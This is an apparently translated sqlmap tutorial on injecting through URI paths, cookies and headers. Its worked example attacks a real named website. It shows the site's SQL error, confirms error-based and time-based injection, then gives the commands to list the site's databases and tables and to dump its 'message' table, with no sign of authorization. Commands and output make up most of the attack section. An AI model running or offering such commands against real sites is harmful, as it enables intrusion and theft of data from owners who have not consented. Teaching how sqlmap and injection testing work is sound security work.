How to use sqlmap for injection in address of a web site page (URI). Arbitrary injection points

URI injection point

Sometimes the injection point is inside the URI itself. For example, if we go to http://youfio.ru/name/АГАФЬЯ.html web site, we will see the web page:

And if in the URI we add a quote to make it so http://youfio.ru/name/АГАФЬЯ'.html, then we will see the familiar:

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''АГАФЬЯ'') and message.ST<>0 ORDER BY message.DT DESC limit 0,20' at line 4

sqlmap does not perform any automatic test against URI paths, unless manually pointed to. You have to specify these injection points in the command line by appending an asterisk (*) (Note: Havij style %INJECT HERE% is also supported) after each URI point that you want sqlmap to test for and exploit a SQL injection.

This is particularly useful when, for instance, Apache web server's mod_rewrite module is in use or other similar technologies.

An example of valid command line would be:

sqlmap -u "http://targeturl/param1/value1*/param2/value2/"

Let us return to our target web site. To test that site the command should look like this:

sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html"

The program says:

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

That is in the '-u' option, a custom injection marker ('*') was found. Whether we want to continue – we agree, because there is no mistake.

Again the program asks:

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

Choose C, i.e. continue.

The program says:

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Agree.

Again the question:

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

Select an option up to you.

There is a SQL-injection vulnerability, about it speak lines:

[17:21:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[17:21:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks

By the way, if you did not know, now sqlmap also checks on XSS.

Details about the vulnerability:

[17:22:05] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable

And further:

[17:23:57] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable

Next, as with normal SQL injections, when the GET or POST parameter is vulnerable, we get a list of databases:

sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" --dbs

The server has the following databases:

available databases [2]:
[*] information_schema
[*] snicke_youfioru

We get the tables in the 'snicke_youfioru' database:

sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" -D 'snicke_youfioru' --tables

The list of tables:

We get the contents of the 'message' table:

sqlmap -u "http://youfio.ru/name/АГАФЬЯ*.html" -D 'snicke_youfioru' -T 'message' --dump

Arbitrary injection point

Similar to URI injection point, asterisk (*) (Note: Havij style %INJECT HERE% is also supported) can also be used to point to the arbitrary injection point inside GET, POST or HTTP headers. Injection point can be specified by marking it inside the GET parameter value(s) provided with option -u, POST parameter value(s) provided with option --data, HTTP header value(s) provided with options -H, --headers, --user-agent, --referer and/or --cookie, or at generic place inside HTTP request loaded from file with option -r.

An example of valid command line would be:

sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"

The asterisk can be used more than once, i.e. there may be several injection points, for example:

sqlmap -u "http://www.example.com/*-*"